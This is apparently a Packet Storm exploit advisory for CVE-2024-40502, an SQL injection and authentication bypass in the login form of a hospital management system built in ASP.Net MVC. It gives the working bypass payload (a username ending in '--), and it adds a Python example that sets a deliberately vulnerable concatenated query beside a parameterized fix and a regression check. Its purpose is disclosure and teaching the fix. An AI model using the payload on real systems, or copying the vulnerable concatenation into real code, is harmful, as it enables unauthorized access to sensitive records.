packetstorm | 0xMykull | PACKETSTORM:179583
Jul 17, 2024 - 12:00 a.m.

Hospital Management System Project In ASP.Net MVC 1 SQL Injection

Published: 2024-07-17 00:00:00
Author: 0xMykull
Source: packetstormsecurity.com
Tags: exploit, vulnerability, sql injection, authentication bypass, web application, improper sanitization, user input

AI Score: 7.4
Confidence: Low
EPSS: 0
Percentile: 16.1%

`# Exploit Title: Hospital Management System Project in ASP.Net MVC - SQL Injection / Authentication Bypass  
# Date: 07/16/2024  
# Exploit Author: 0xMykull  
# Vendor Homepage: https://itsourcecode.com/free-projects/asp/hospital-management-system-project-in-asp-net-mvc-with-source-code/  
# Software Link: https://itsourcecode.com/free-projects/asp/hospital-management-system-project-in-asp-net-mvc-with-source-code/  
# Version: 1  
# CVE: CVE-2024-40502  
  
Description:  
An SQL injection vulnerability has been discovered in the btn_login_b_Click  
function of the affected web application. The vulnerability exists due to  
the improper sanitization of user-supplied input in the login form.  
Specifically, the txt_login_username.Text and txt_login_pass.Text fields  
are concatenated directly into an SQL query string without proper  
parameterization or escaping.  
  
Endpoint: https://localhost:44306/Users/Loginpage.aspx  
  
Bypass Payloads:  
  
(default user)  
Username: kihsan'--  
password: <anything>  
  
Username: <anyvaliduser>'--  
password: <anything>  
`
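
An added example, not code from the advisory or from the affected project: it models the concatenation pattern described above in Python with an in-memory SQLite database and sets the parameterized form beside it, with a small regression check. The `users` table, its columns, the stored password and all function names are assumptions; the only value taken from the page is the advisory's username payload.

```python
import sqlite3

def make_db():
    # Constructed sample data. Table and column names are assumptions, and the
    # plaintext password is for brevity only (real systems store a salted hash).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    db.execute("INSERT INTO users VALUES ('kihsan', 'correct-horse')")
    return db

def login_concatenated(db, username, password):
    # The pattern the advisory describes: both fields are pasted into the SQL
    # text. A quote in the input closes the string literal, and "--" turns the
    # rest of the statement, including the password comparison, into a comment.
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchone() is not None

def login_parameterized(db, username, password):
    # The fix: the SQL text is constant and the values are bound parameters,
    # so they are compared as data and never parsed as SQL.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone() is not None

# Constructed regression cases: (label, username, password, should_log_in)
CASES = [
    ("valid credentials", "kihsan", "correct-horse", True),
    ("wrong password", "kihsan", "wrong", False),
    ("advisory payload", "kihsan'--", "anything", False),
]

def failing_cases(login):
    """Return the labels of cases where `login` gives the wrong outcome."""
    db = make_db()
    return [label for label, user, pw, expected in CASES
            if login(db, user, pw) != expected]

if __name__ == "__main__":
    print("concatenated :", failing_cases(login_concatenated))
    print("parameterized:", failing_cases(login_parameterized))
```

If the handler uses ADO.NET, the equivalent change is a `SqlCommand` with named parameters in place of the concatenated `txt_login_username.Text` and `txt_login_pass.Text` values.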
